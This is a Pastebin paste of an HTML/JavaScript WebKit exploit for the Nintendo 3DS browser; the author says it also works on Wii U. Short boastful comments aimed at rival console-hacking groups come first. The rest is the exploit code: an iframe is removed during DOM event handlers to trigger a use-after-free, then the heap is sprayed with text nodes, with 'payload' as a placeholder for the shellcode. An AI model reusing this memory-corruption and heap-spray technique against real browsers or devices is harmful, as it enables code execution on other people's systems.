daily pastebin goal
63%
SHARE
TWEET

WebKit Exploit N3DS + Bonus Exploit Wii U

3DSnice Mar 18th, 2015 (edited) 4,964 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Too bad that they take too long to figure out how make their Payload working.
  2. This is a working Webkit Exploit for N3DS/3DS/etc.. up to 9.5.
  3. I make it more simple, actually iframe display none help ;)
  4. It also work on Wii U up to 5.3.2 by using User Agent Nintendo 3DS
  5. Now hopefully devs or this shit team called Gateway 3DS will figure out how their own payload work.
  6. Special message to MathewE, do you really think that you are the only one who can work with this ?
  7. I know how you false bug work, including Miiplaza and co, you are late on the party.
  8.  
  9.  
  10.  
  11. <html>
  12. <head>
  13. <style> body {color:blue;background:black;} iframe {display:none;} h1 {text-align:center;}
  14.        
  15. </style>
  16. <script>
  17.     if(parent==window) {
  18.         window.onload = function() {
  19.             document.body.innerHTML += "<iframe src='#' />";      
  20.  };
  21.     } else if(navigator.userAgent.indexOf('Nintendo 3DS') != -1) {
  22.         var nb = 0;
  23.         window.onload = function () {
  24.             f = window.frameElement;
  25.             p = f.parentNode;
  26.             var o = document.createElement("object");
  27.             o.addEventListener('beforeload', function () {
  28.                 if (++nb == 1) {
  29.                     p.addEventListener('DOMSubtreeModified', parent.dsm, false);
  30.                 } else if (nb == 2) {
  31.                     p.removeChild(f);
  32.                 }
  33.             }, false);
  34.             document.body.appendChild(o);
  35.         };
  36.     }
  37.     function magicfun(mem, size, v) {
  38.         var a = new Array(size - 20);
  39.         nv = v + unescape("%ucccc");
  40.         for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
  41.         var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
  42.  
  43.         mem.push(t);
  44.     }
  45.  
  46.     function dsm(e) {
  47.         var mem = [];
  48.         for (var j = 20; j < 430; j++)
  49.            magicfun(mem, j, unescape("payload"));
  50.            
  51.     }
  52.  
  53. </script>
  54. </head>
  55. <body>
  56. </body>
  57. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top